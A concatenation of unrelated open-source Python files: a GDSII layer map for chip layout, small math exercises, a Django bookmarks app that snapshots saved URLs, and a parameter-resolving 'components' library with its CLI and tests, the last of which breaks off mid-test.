RDD.PLAYER.J5.JUNCTION = PhysicalLayer(process=RDD.PROCESS.J5, purpose=RDD.PURPOSE.JUNCTION)
RDD.PLAYER.J5.UNION = PhysicalLayer(process=RDD.PROCESS.J5, purpose=RDD.PURPOSE.UNION)
RDD.PLAYER.J5.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.J5, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.C5J.VIA = PhysicalLayer(name='C5J', process=RDD.PROCESS.C5J, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.C5R.VIA = PhysicalLayer(name='C5R', process=RDD.PROCESS.C5R, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.C5R.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.C5R, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.C5R.UNION = PhysicalLayer(name='C5R', process=RDD.PROCESS.C5R, purpose=RDD.PURPOSE.UNION)
RDD.PLAYER.I0.VIA = PhysicalLayer(name='I0', process=RDD.PROCESS.I0, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I0.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I0, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.I1.VIA = PhysicalLayer(name='I1', process=RDD.PROCESS.I1, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I1.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I1, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.I2.VIA = PhysicalLayer(name='I2', process=RDD.PROCESS.I2, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I2.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I2, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.I3.VIA = PhysicalLayer(name='I3', process=RDD.PROCESS.I3, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I3.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I3, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.I4.VIA = PhysicalLayer(name='I4', process=RDD.PROCESS.I4, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I4.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I4, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.I5.VIA = PhysicalLayer(process=RDD.PROCESS.I5, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I5.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I5, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.I5.UNION = PhysicalLayer(process=RDD.PROCESS.I5, purpose=RDD.PURPOSE.UNION)
RDD.PLAYER.I5.DIFFERENCE = PhysicalLayer(process=RDD.PROCESS.I5, purpose=RDD.PURPOSE.DIFFERENCE)
RDD.PLAYER.I6.VIA = PhysicalLayer(name='I6', process=RDD.PROCESS.I6, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I6.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I6, purpose=RDD.PURPOSE.PORT.CONTACT)
# ------------------------------ Map GDSII Layers -------------------------------
RDD.GDSII.PROCESS_LAYER_MAP = {
RDD.PROCESS.PORT : 19,
RDD.PROCESS.VIRTUAL : 199,
RDD.PROCESS.GND : 0,
RDD.PROCESS.R5 : 52,
RDD.PROCESS.M0 : 1,
RDD.PROCESS.M1 : 10,
RDD.PROCESS.M2 : 20,
RDD.PROCESS.M3 : 30,
RDD.PROCESS.M4 : 40,
RDD.PROCESS.M5 : 50,
RDD.PROCESS.M6 : 60,
RDD.PROCESS.M7 : 70,
RDD.PROCESS.J5 : 51,
RDD.PROCESS.C5R : 56,
RDD.PROCESS.C5J : 55,
RDD.PROCESS.CM1 : 11,
RDD.PROCESS.CM2 : 21,
RDD.PROCESS.CM3 : 31,
RDD.PROCESS.I0 : 2,
RDD.PROCESS.I1 : 11,
RDD.PROCESS.I2 : 21,
RDD.PROCESS.I3 : 31,
RDD.PROCESS.I4 : 41,
RDD.PROCESS.I5 : 54,
RDD.PROCESS.I6 : 61,
RDD.PROCESS.SKY : 99,
}
RDD.GDSII.PURPOSE_DATATYPE_MAP = {
RDD.PURPOSE.GROUND : 0,
RDD.PURPOSE.METAL : 0,
RDD.PURPOSE.DEVICE_METAL : 100,
RDD.PURPOSE.CIRCUIT_METAL : 101,
RDD.PURPOSE.SKY : 3,
RDD.PURPOSE.HOLE : 4,
RDD.PURPOSE.BOUNDARY_BOX : 5,
RDD.PURPOSE.PORT.DIRECTION : 6,
RDD.PURPOSE.PORT.INSIDE_EDGE_ENABLED : 7,
RDD.PURPOSE.PORT.INSIDE_EDGE_DISABLED : 8,
RDD.PURPOSE.PORT.IXPORT : 0,
RDD.PURPOSE.VIA : 0,
RDD.PURPOSE.JUNCTION : 0,
RDD.PURPOSE.ROUTE : 11,
RDD.PURPOSE.INTERSECTED : 12,
RDD.PURPOSE.UNION : 13,
RDD.PURPOSE.DIFFERENCE : 14,
RDD.PURPOSE.PORT.PIN : 15,
RDD.PURPOSE.PORT.TERMINAL : 28,
RDD.PURPOSE.PORT.EDGE : 16,
RDD.PURPOSE.PORT.CONTACT : 17,
RDD.PURPOSE.PORT.BRANCH : 18,
RDD.PURPOSE.PORT.DUMMY : 19,
RDD.PURPOSE.PORT.ROUTE : 26,
RDD.PURPOSE.TEXT.PIN : 20,
RDD.PURPOSE.TEXT.TERMINAL : 27,
RDD.PURPOSE.TEXT.EDGE : 0,
RDD.PURPOSE.TEXT.CONTACT : 0,
RDD.PURPOSE.TEXT.ROUTE : 25,
RDD.PURPOSE.TEXT.DUMMY : 26,
RDD.PURPOSE.PORT.OUTSIDE_EDGE_ENABLED : 23,
RDD.PURPOSE.PORT.OUTSIDE_EDGE_DISABLED : 24,
RDD.PURPOSE.TEXT : 64,
}
RDD.GDSII.EXPORT_LAYER_MAP = MapPhysicalToGdsii(
process_layer_map=RDD.GDSII.PROCESS_LAYER_MAP,
purpose_datatype_map=RDD.GDSII.PURPOSE_DATATYPE_MAP
)
RDD.GDSII.IMPORT_LAYER_MAP = MapGdsiiToPhysical(
process_layer_map=RDD.GDSII.PROCESS_LAYER_MAP,
purpose_datatype_map=RDD.GDSII.PURPOSE_DATATYPE_MAP
)
# ------------------------------------- Virtual Modelling ----------------------------------------------
RDD.VMODEL = PhysicalLayerDatabase()
RDD.VMODEL.PROCESS_FLOW = VModelProcessFlow(
active_processes=[
RDD.PROCESS.M0,
RDD.PROCESS.M1,
RDD.PROCESS.M2,
RDD.PROCESS.M3,
RDD.PROCESS.M4,
RDD.PROCESS.M5,
RDD.PROCESS.M6,
RDD.PROCESS.M7,
RDD.PROCESS.R5,
RDD.PROCESS.CM1,
RDD.PROCESS.CM2,
RDD.PROCESS.CM3,
RDD.PROCESS.I0,
RDD.PROCESS.I1,
RDD.PROCESS.I2,
RDD.PROCESS.I3,
RDD.PROCESS.I4,
RDD.PROCESS.I5,
RDD.PROCESS.I6,
RDD.PROCESS.C5R,
RDD.PROCESS.C5J,
RDD.PROCESS.J5,
RDD.PROCESS.PORT
]
)
# ------------------------------------- Virtual Modelling ----------------------------------------------
RDD.VIAS = ParameterDatabase()
# --- ViaI5 ---
RDD.VIAS.I5 = ParameterDatabase()
RDD.VIAS.I5.LAYER_STACK = {
'BOT_LAYER' : RDD.PLAYER.M5.METAL,
'TOP_LAYER' : RDD.PLAYER.M6.METAL,
'VIA_LAYER' : RDD.PLAYER.I5.VIA
}
RDD.PLAYER.I5.CLAYER_CONTACT = RDD.PLAYER.M5.METAL & RDD.PLAYER.M6.METAL & RDD.PLAYER.I5.VIA
RDD.PLAYER.I5.CLAYER_M1 = RDD.PLAYER.M5.METAL ^ RDD.PLAYER.I5.VIA
RDD.PLAYER.I5.CLAYER_M2 = RDD.PLAYER.M6.METAL ^ RDD.PLAYER.I5.VIA
class I5_PCELL_Database(LazyDatabase):
def initialize(self):
from ..devices.via import ViaI5
self.DEFAULT = ViaI5
RDD.VIAS.I5.PCELLS = I5_PCELL_Database()
# --- ViaC5RA ---
RDD.VIAS.C5R = ParameterDatabase()
RDD.VIAS.C5R.LAYER_STACK = {
'BOT_LAYER' : RDD.PLAYER.R5.METAL,
'TOP_LAYER' : RDD.PLAYER.M6.METAL,
'VIA_LAYER' : RDD.PLAYER.C5R.VIA
}
RDD.PLAYER.C5R.CLAYER_CONTACT = RDD.PLAYER.R5.METAL & RDD.PLAYER.M6.METAL & RDD.PLAYER.C5R.VIA
RDD.PLAYER.C5R.CLAYER_M1 = RDD.PLAYER.R5.METAL ^ RDD.PLAYER.C5R.VIA
RDD.PLAYER.C5R.CLAYER_M2 = RDD.PLAYER.M6.METAL ^ RDD.PLAYER.C5R.VIA
class C5R_PCELL_Database(LazyDatabase):
def initialize(self):
from ..devices.via import ViaC5RA, ViaC5RS
self.DEFAULT = ViaC5RA
self.STANDARD = ViaC5RS
RDD.VIAS.C5R.PCELLS = C5R_PCELL_Database()
# --- ViaJ5 ---
RDD.VIAS.J5 = ParameterDatabase()
RDD.VIAS.J5.LAYER_STACK = {
'BOT_LAYER' : RDD.PLAYER.M5.METAL,
'TOP_LAYER' : RDD.PLAYER.M6.METAL,
'VIA_LAYER' : RDD.PLAYER.J5.JUNCTION
}
RDD.PLAYER.J5.CLAYER_CONTACT = RDD.PLAYER.M5.METAL & RDD.PLAYER.M6.METAL & RDD.PLAYER.J5.JUNCTION
RDD.PLAYER.J5.CLAYER_M1 = RDD.PLAYER.M5.METAL ^ RDD.PLAYER.J5.JUNCTION
RDD.PLAYER.J5.CLAYER_M2 = RDD.PLAYER.M6.METAL ^ RDD.PLAYER.J5.JUNCTION
class J5_PCELL_Database(LazyDatabase):
def initialize(self):
from ..devices.via import JJ
self.DEFAULT = JJ
RDD.VIAS.J5.PCELLS = J5_PCELL_Database()
``` |
{
"source": "JoeyDeRosa/code_katas",
"score": 4
} |
#### File: code_katas/Sum_Of_Nth_Terms/sum_of_nth_terms.py
```python
def series_sum(n):
'''Add 1 divided by a div increasing by three for range n.'''
if n == 0:
return '0.00'
acc = 0
div = -2
for i in range(n):
div += 3
acc += 1 / div
acc = str(round(acc, 2))
if len(acc) <= 3:
acc += '0'
return acc
``` |
{
"source": "JoeyDeSmet/Algorithm-intro",
"score": 4
} |
#### File: Algorithm-intro/Exercises/Riemann.py
```python
import math
def f(x):
return math.pow(x, 2) + 3 * x + 15
def riemannIntegral(interval, a):
x = interval[0]
step = (interval[1] - interval[0]) / a
x1 = x + step
integral = 0
for i in range (interval[0], a):
width = x1 - x
height = f(x1)
integral += width * height
x = x1
x1 = x + step
return integral
print(riemannIntegral([0, 5], 5))
print(riemannIntegral([0, 5], 8))
print(riemannIntegral([0, 5], 1_000_000))
``` |
{
"source": "joeydi/later-api",
"score": 2
} |
#### File: later-api/bookmarks/admin.py
```python
from django.contrib import admin
from django.contrib.admin import SimpleListFilter
from django.db.models import Count, Q
from .models import Bookmark, Snapshot
class SnapshotAdmin(admin.ModelAdmin):
readonly_fields = ['bookmark']
date_hierarchy = 'created_at'
list_display = [
'status_code',
'favicon',
'created_at',
]
admin.site.register(Snapshot, SnapshotAdmin)
class SnapshotInline(admin.StackedInline):
model = Snapshot
extra = 0
class StatusCodeFilter(SimpleListFilter):
title = 'status_code'
parameter_name = 'status_code'
def lookups(self, request, model_admin):
status_codes = Snapshot.objects.values_list(
'status_code', flat=True).order_by('status_code').distinct()
return [(code, code) for code in status_codes]
def queryset(self, request, queryset):
if self.value():
with_status_code = Count('snapshots', filter=Q(snapshots__status_code=self.value()))
queryset = queryset.annotate(status_code_count=with_status_code).filter(status_code_count__gt=0)
return queryset
class BookmarkAdmin(admin.ModelAdmin):
date_hierarchy = 'created_at'
list_display = [
'status_code',
'title',
'url',
'user',
'selection',
'folder',
'created_at',
]
list_filter = [
'folder',
StatusCodeFilter,
]
inlines = [
SnapshotInline
]
admin.site.register(Bookmark, BookmarkAdmin)
```
#### File: management/commands/save_snapshots.py
```python
import os
import csv
from pprint import pprint
from datetime import datetime
import pytz
from django.core.management.base import BaseCommand, CommandError
from django.utils import timezone
from django.db.models import Count
from django.contrib.auth.models import User
from bookmarks.models import Bookmark
class Command(BaseCommand):
help = "Saves Bookmark Snapshots from HTTP requests"
def add_arguments(self, parser):
parser.add_argument(
"-o", "--offset", type=int, help="Query Offset",
)
parser.add_argument(
"-l", "--limit", type=int, help="Query Limit",
)
def handle(self, *args, **kwargs):
offset = kwargs["offset"] if kwargs["offset"] else 0
limit = (kwargs["limit"] + offset) if kwargs["limit"] else (10 + offset)
bookmarks = Bookmark.objects.annotate(Count("snapshots")).filter(
snapshots__count=0
)[offset:limit]
for bookmark in bookmarks:
self.stdout.write(
self.style.SUCCESS(
'Saving Snapshot for Bookmark: "%s"' % bookmark.title
)
)
bookmark.save_snapshot()
```
#### File: later-api/bookmarks/models.py
```python
import json
import requests
from lxml import etree
from urllib.parse import urlparse
from dragnet import extract_content
from dragnet.blocks import BlockifyError
from django.db import models
from django.dispatch import receiver
from django.contrib.auth.models import User
from taggit.managers import TaggableManager
from favicon.favicon import tags as favicon_tags
from .utils import TextRank4Keyword, LaterOpenGraph
class Bookmark(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="bookmarks")
url = models.URLField(max_length=2048)
title = models.CharField(blank=True, max_length=255)
selection = models.TextField(blank=True)
folder = models.CharField(blank=True, max_length=255, default="Unread")
tags = TaggableManager(blank=True)
@property
def status_code(self):
return self.snapshots.first().status_code if self.snapshots.exists() else None
@property
def domain(self):
return urlparse(self.url).hostname
@property
def description(self):
return (
self.snapshots.first().opengraph.get("description")
if self.snapshots.exists()
else None
)
@property
def favicon(self):
return self.snapshots.first().favicon if self.snapshots.exists() else None
def save_snapshot(self):
try:
r = requests.get(self.url)
except (
requests.exceptions.SSLError,
requests.exceptions.ConnectionError,
requests.exceptions.ReadTimeout,
) as e:
print(e)
return None
snapshot = {
"bookmark": self,
"content": r.text,
"headers_json": json.dumps(
{item[0]: item[1] for item in r.headers.items()}
),
"status_code": r.status_code,
}
try:
ogp = LaterOpenGraph(html=r.text)
snapshot["opengraph_json"] = ogp.to_json()
except AttributeError:
print("OpenGraph Error")
pass
try:
snapshot["parsed_content"] = extract_content(r.text)
except BlockifyError:
print("dragnet extract_content: BlockifyError")
snapshot["parsed_content"] = ""
pass
try:
tags = favicon_tags(self.url, r.text)
tags = sorted(tags, key=lambda i: i.width + i.height, reverse=True)
snapshot["favicon"] = tags[0].url
print(snapshot["favicon"])
except IndexError:
print("No Favicon Found")
pass
try:
tr4w = TextRank4Keyword()
tr4w.analyze(snapshot["parsed_content"])
keywords_weighted = tr4w.node_weight.items()
keywords_sorted = sorted(
keywords_weighted, key=lambda item: item[1], reverse=True
)
tags = [k.lower() for (k, v) in keywords_sorted if len(k) < 100][:9]
self.tags.add(*tags)
except MemoryError:
print("MemoryError while parsing keywords")
pass
# If the bookmark does not yet have a title, grab it from the document title
if not self.title:
try:
parser = etree.XMLParser(recover=True)
document = etree.fromstring(r.text, parser)
self.title = document.find(".//title").text
self.save()
except ValueError:
print("Error parsing document...")
pass
except AttributeError:
print("No title tag found...")
pass
# If we still don't have a title, grab it from the opengraph tags
if not self.title and ogp.get("title"):
self.title = ogp.get("title")
self.save()
return Snapshot.objects.create(**snapshot)
def __str__(self):
return self.title
class Meta:
ordering = ["-created_at"]
@receiver(models.signals.post_save, sender=Bookmark)
def execute_after_save(sender, instance, created, *args, **kwargs):
if created:
instance.save_snapshot()
class Snapshot(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
bookmark = models.ForeignKey(
Bookmark, on_delete=models.CASCADE, related_name="snapshots"
)
content = models.TextField(blank=True)
headers_json = models.TextField(blank=True)
parsed_content = models.TextField(blank=True)
status_code = models.IntegerField(blank=True)
opengraph_json = models.TextField(blank=True)
favicon = models.URLField(blank=True, max_length=2048)
@property
def headers(self):
return json.loads(self.headers_json)
@property
def opengraph(self):
return json.loads(self.opengraph_json) if self.opengraph_json else None
def __str__(self):
return self.bookmark.title
class Meta:
ordering = ["-created_at"]
``` |
{
"source": "JoeyDP/bacli",
"score": 3
} |
#### File: bacli/bacli/cli_legacy.py
```python
import atexit
import inspect
import argparse
functions = dict()
description = ""
def setDescription(desc):
global description
description = desc
# decorator for runnable functions
def command(f):
fName = f.__name__
if fName in functions:
print("Function {} already registered, overwriting it..")
functions[fName] = f
return f
def parse_args():
parser = argparse.ArgumentParser(description=description)
subparsers = parser.add_subparsers(help="Select one of the following subcommands:", dest='command', metavar="subcommand")
subparsers.required = True
for fName, f in functions.items():
sub_parser = subparsers.add_parser(fName, help=f.__doc__, description=f.__doc__)
for param in inspect.signature(f).parameters.values():
tpe = param.annotation
if tpe is inspect.Parameter.empty:
tpe = str
if param.default is not inspect.Parameter.empty:
prefix = "-" if len(param.name) == 1 else "--"
sub_parser.add_argument(prefix + param.name,
help="type: {}, default={}".format(tpe.__name__, param.default),
type=tpe, default=param.default)
else:
sub_parser.add_argument(param.name, help="type: " + tpe.__name__,
type=tpe)
cmd_args = parser.parse_args()
fName = cmd_args.command
f = functions[fName]
args = cmd_args._get_args()
kwargs = {n: v for n, v in cmd_args._get_kwargs() if n != "command"}
f(*args, **kwargs)
def main():
try:
if len(functions) > 0:
parse_args()
except argparse.ArgumentError:
pass
except SystemExit:
pass
# if imported
if __name__ != "__main__":
atexit.register(main)
``` |
{
"source": "JoeyDP/Components",
"score": 3
} |
#### File: Components/components/cli.py
```python
from abc import ABC, abstractmethod
import argparse
import inspect
from components import Component
class MyHelpFormatter(argparse.ArgumentDefaultsHelpFormatter):
""" Custom help formatter for argparse. """
def _get_default_metavar_for_optional(self, action):
if action.type is None:
return ""
return action.type.__name__
def _get_default_metavar_for_positional(self, action):
if action.type is None:
return ""
return action.type.__name__
class CLI:
def __init__(self, description=""):
self.commands = dict()
self.parser = argparse.ArgumentParser(description=description)
self.subparsers = self.parser.add_subparsers(
help="Select one of the following subcommands:",
dest='command',
metavar="subcommand"
)
self.subparsers.required = True
def __call__(self):
self.run()
def run(self):
if len(self.commands) > 0:
self.setup()
cls, kwargs = self.parse_args()
obj = cls.resolve(**kwargs)
obj.run()
@property
def Command(self):
class Command(ABC):
""" Resolves parameters from command line arguments. """
def __init_subclass__(cls, **kwargs):
""" Hooks the subclass as a runnable command. """
super().__init_subclass__(**kwargs)
if not issubclass(cls, Component):
raise TypeError("cli.Command should only be used on Components")
self.commands[cls.__name__] = cls
@abstractmethod
def run(self):
pass
return Command
def setup(self):
for cls in self.commands.values():
self.setup_command(cls)
def setup_command(self, cls):
sub_parser = self.subparsers.add_parser(
cls.__name__,
help=cls.__doc__,
description=cls.__doc__,
formatter_class=MyHelpFormatter
)
def add_bool_param(parser, *names, dest, default):
"""
Add boolean parameter as two flags (--name/--no-name).
default indicates default value or None for a required boolean parameter.
"""
required = default is None
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument(*names, help="(default)" if default is True else "", dest=dest,
action='store_true')
# strip dashes and add '--no-'
no_names = [f"--no-{name[2 if name[:2] == '--' else 1:]}" for name in names]
group.add_argument(*no_names, help="(default)" if default is False else "",
dest=dest, action='store_false')
if default is not None:
group.set_defaults(**{dest: default})
def format_name(name):
param_name = name.replace('_', '-')
prefix = "-" if len(param_name) == 1 else "--"
return prefix + param_name
required_arguments = sub_parser.add_argument_group('required arguments')
for param in cls.get_requested_params(flatten=True):
required = param.default is inspect.Parameter.empty
names = [format_name(alias) for alias in sorted(param.aliases, key=len) if not (alias.startswith('_'))]
if required:
p = required_arguments
else:
p = sub_parser
if param.type == bool:
add_bool_param(p, *names, dest=param.full_name, default=None if required else param.default)
else:
conditional_kwargs = dict()
if not required:
conditional_kwargs['default'] = param.default
conditional_kwargs['help'] = "(default: %(default)s)"
p.add_argument(*names,
type=param.type,
dest=param.full_name,
required=required,
**conditional_kwargs)
def parse_args(self):
cmd_args = self.parser.parse_args()
fName = cmd_args.command
cls = self.commands[fName]
kwargs = {n: v for n, v in cmd_args._get_kwargs() if n != "command"}
return cls, kwargs
```
#### File: Components/components/param.py
```python
class Param(object):
def __init__(self, name, tpe, default, aliases=None):
# original name of the parameter
self.name = name
self.type = tpe
self.default = default
# aliases need to be unique within the component hierarchy. ComponentParam.enforce_consistency() checks this.
if aliases is None:
self.aliases = {self.name}
else:
self.aliases = set(aliases)
@property
def minimal_name(self):
""" Shortest name that still uniquely identifies the parameter. """
if len(self.aliases) == 0:
return self.name
return min(self.aliases, key=len)
@property
def full_name(self):
""" Fully defined name in component hierarchy. """
if len(self.aliases) == 0:
return self.name
return max(self.aliases, key=len)
def __repr__(self):
return f"Param: {self.full_name}"
def remove_invalid_aliases(self):
str_numbers = set(map(str, range(10)))
self.aliases = {alias for alias in self.aliases if not alias[0] in str_numbers}
def _remove_conflicting_aliases(self, name_map):
for alias in list(self.aliases):
if alias in name_map:
# name already defined
other_param = name_map[alias]
# use discard iso remove, because it may have already been deleted from the mapped param
other_param.aliases.discard(alias)
self.aliases.remove(alias)
# Note: do not remove param from name_map, because conflict can occur more than 2 times
else:
name_map[alias] = self
def check_valid(self):
""" Check if parameter still has at least one name. """
if len(self.aliases) == 0:
raise AttributeError(f"No valid identifier for parameter {self.name}")
def flatten(self):
""" Return flattened version of params, without components. """
return [self]
class ComponentParam(Param):
def __init__(self, name, tpe, default, params=None, aliases=None):
super().__init__(name, tpe, default, aliases=aliases)
if params is None:
self.params = list()
else:
self.params = params
def __repr__(self):
return f"ComponentParam: {self.full_name}"
def enforce_consistency(self):
# 1. remove aliases that aren't valid identifiers.
self.remove_invalid_aliases()
# 2. remove all shadowed variable names
self.remove_shadowed_aliases()
# 3. resolve all conflicting names
self.remove_conflicting_aliases()
# 4. if param without valid identifier, raise error
self.check_valid()
def remove_invalid_aliases(self):
""" Remove aliases that aren't valid identifiers. """
super().remove_invalid_aliases()
for param in self.params:
param.remove_invalid_aliases()
def remove_shadowed_aliases(self):
"""
Remove all variable names that conflict with a parent name.
Uses depth first traversal to remove parent names from children.
"""
self._remove_shadowed_aliases(set())
def _remove_shadowed_aliases(self, defined):
all_param_names = self.aliases.copy()
for param in self.params:
all_param_names |= param.aliases
for param in self.params:
param.aliases -= defined # prune aliases as well
if isinstance(param, ComponentParam):
param._remove_shadowed_aliases(defined | all_param_names)
def remove_conflicting_aliases(self):
"""
Remove all names that occur multiple times, without a parent-child relation.
Uses in-order traversal with map from names to components to detect conflicts.
"""
name_map = dict()
self._remove_conflicting_aliases(name_map)
def _remove_conflicting_aliases(self, name_map):
super()._remove_conflicting_aliases(name_map)
for param in self.params:
param._remove_conflicting_aliases(name_map)
def check_valid(self):
""" Check if every parameter still has at least one name. """
super().check_valid()
for param in self.params:
param.check_valid()
def flatten(self):
""" Return flattened version of params, without components. """
return sum(map(lambda x: x.flatten(), self.params), [])
```
#### File: components/test/test_component.py
```python
import pytest
from components import Component
def test_resolve_component():
class Comp(Component):
def __init__(self, a, b=3):
self.a = a
self.b = b
c = Comp.resolve(a=4)
assert c.get_params() == {'a': 4, 'b': 3}
assert c.a == 4 and c.b == 3
c = Comp.resolve(a=4, b=5)
assert c.get_params() == {'a': 4, 'b': 5}
assert c.a == 4 and c.b == 5
with pytest.raises(TypeError):
with pytest.warns(RuntimeWarning):
Comp.resolve()
with pytest.raises(TypeError):
with pytest.warns(RuntimeWarning):
Comp.resolve(b=5)
with pytest.raises(TypeError):
with pytest.warns(RuntimeWarning):
Comp.resolve(other_param=3)
def test_attribute_override_default():
class Comp(Component):
key = 3
def __init__(self, key=5):
self.key = key
# Use `resolve` to check attributes
c = Comp.resolve()
assert c.get_params() == {'key': 3}
assert c.key == 3
c = Comp.resolve(key=9)
assert c.get_params() == {'key': 9}
assert c.key == 9
# Normal object creation ignores attribute override for parameter 'key'
c = Comp()
assert c.get_params() == {'key': 5}
assert c.key == 5
c = Comp(key=7)
assert c.get_params() == {'key': 7}
assert c.key == 7
def test_resolve_subcomponent():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve(key=4)
assert c.get_params()['sub'].get_params() == {'key': 4}
assert c.sub.key == 4
c = Comp.resolve(sub_key=42)
assert c.get_params()['sub'].get_params() == {'key': 42}
assert c.sub.key == 42
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'key': 5}
assert c.sub.key == 5
c = Comp.resolve(sub=SubComp(8))
assert c.get_params()['sub'].get_params() == {'key': 8}
assert c.sub.key == 8
with pytest.warns(RuntimeWarning):
c = Comp.resolve(sub=3)
assert c.sub == 3
with pytest.raises(TypeError):
Comp.resolve(par1=42)
with pytest.raises(TypeError):
Comp.resolve(sub=SubComp(8), key=5)
def test_resolve_subcomponent_conflicting_params():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp, key=3):
self.sub = sub
self.key = key
with pytest.raises(TypeError):
Comp.resolve(other_key=42)
c = Comp.resolve()
assert c.get_params()['key'] == 3 and c.get_params()['sub'].get_params() == {'key': 5}
assert c.key == 3 and c.sub.key == 5
c = Comp.resolve(key=42)
assert c.get_params()['key'] == 42 and c.get_params()['sub'].get_params() == {'key': 5}
assert c.key == 42 and c.sub.key == 5
c = Comp.resolve(sub_key=8)
assert c.get_params()['key'] == 3 and c.get_params()['sub'].get_params() == {'key': 8}
assert c.key == 3 and c.sub.key == 8
c = Comp.resolve(key=10, sub_key=1)
assert c.get_params()['key'] == 10 and c.get_params()['sub'].get_params() == {'key': 1}
assert c.key == 10 and c.sub.key == 1
def test_subcomponent_shadowed_param():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp, key=3):
self.sub = sub
self.key = key
class OtherComp(Component):
sub: Comp
def __init__(self, sub: Comp):
self.sub = sub
c = OtherComp.resolve()
assert type(c.sub) == Comp
assert type(c.sub.sub) == SubComp
with pytest.warns(RuntimeWarning):
c = OtherComp.resolve(sub=None)
assert (c.sub is None)
def test_resolve_conflicting_subcomponent_params():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub1: SubComp, sub2: SubComp):
self.sub1 = sub1
self.sub2 = sub2
with pytest.raises(TypeError):
Comp.resolve(key=42)
with pytest.raises(TypeError):
Comp.resolve(other_key=42)
c = Comp.resolve()
assert c.get_params()['sub1'].get_params() == {'key': 5} and c.get_params()['sub2'].get_params() == {'key': 5}
assert c.sub1.key == 5 and c.sub2.key == 5
c = Comp.resolve(sub1_key=3)
assert c.get_params()['sub1'].get_params() == {'key': 3} and c.get_params()['sub2'].get_params() == {'key': 5}
assert c.sub1.key == 3 and c.sub2.key == 5
c = Comp.resolve(sub2_key=8)
assert c.get_params()['sub1'].get_params() == {'key': 5} and c.get_params()['sub2'].get_params() == {'key': 8}
assert c.sub1.key == 5 and c.sub2.key == 8
c = Comp.resolve(sub1_key=9, sub2_key=42)
assert c.get_params()['sub1'].get_params() == {'key': 9} and c.get_params()['sub2'].get_params() == {'key': 42}
assert c.sub1.key == 9 and c.sub2.key == 42
def test_subcomponent_type_mismatch_warn():
class SubComp(Component):
def __init__(self, key: str = 5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.warns(RuntimeWarning):
Comp.resolve()
with pytest.warns(RuntimeWarning):
Comp.resolve(key=20)
with pytest.warns(None) as r:
Comp.resolve(key="20")
assert len(r) == 0
def test_subcomponent_type_mismatch_no_warn():
class SubComp(Component):
def __init__(self, key: float = 5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.warns(None) as r:
Comp.resolve()
Comp.resolve(key=20)
assert len(r) == 0
with pytest.warns(RuntimeWarning):
Comp.resolve(key="20")
with pytest.warns(RuntimeWarning):
Comp.resolve(sub=None)
class Comp2(Component):
def __init__(self, sub: SubComp = None):
self.sub = sub
with pytest.warns(RuntimeWarning):
Comp.resolve(sub=None)
with pytest.warns(None) as r:
Comp2.resolve()
assert len(r) == 0
def test_subcomponent_change_type_mismatch_warn():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
key: str
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.warns(RuntimeWarning):
Comp.resolve()
with pytest.warns(RuntimeWarning):
Comp.resolve(key=20)
def test_subcomponent_change_type_mismatch_warn2():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
sub_key: str
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.warns(RuntimeWarning):
Comp.resolve()
with pytest.warns(RuntimeWarning):
Comp.resolve(key=20)
def test_subcomponent_conflicting_param_type_are_conflicts_removed():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
# type should not be changed because of conflicting names
key: str
def __init__(self, sub1: SubComp, sub2: SubComp):
self.sub1 = sub1
self.sub2 = sub2
# Capture warning
with pytest.warns(None) as record:
Comp.resolve()
Comp.resolve(sub1_key=20)
Comp.resolve(sub2_key=30)
for warning in record:
assert False, f"Warning should not have been given: {warning}"
assert len(record) == 0, "No warning should be given."
def test_subcomponent_conflicting_param_type_shadow_handled_1():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
# type of subcomp key should not be changed because of conflicting names and parent
key: str
def __init__(self, sub1: SubComp, sub2: SubComp, key: int):
self.key = key
self.sub1 = sub1
self.sub2 = sub2
with pytest.warns(RuntimeWarning):
Comp.resolve(key=123)
with pytest.warns(RuntimeWarning):
Comp.resolve(key="123", sub1_key="456")
with pytest.warns(RuntimeWarning):
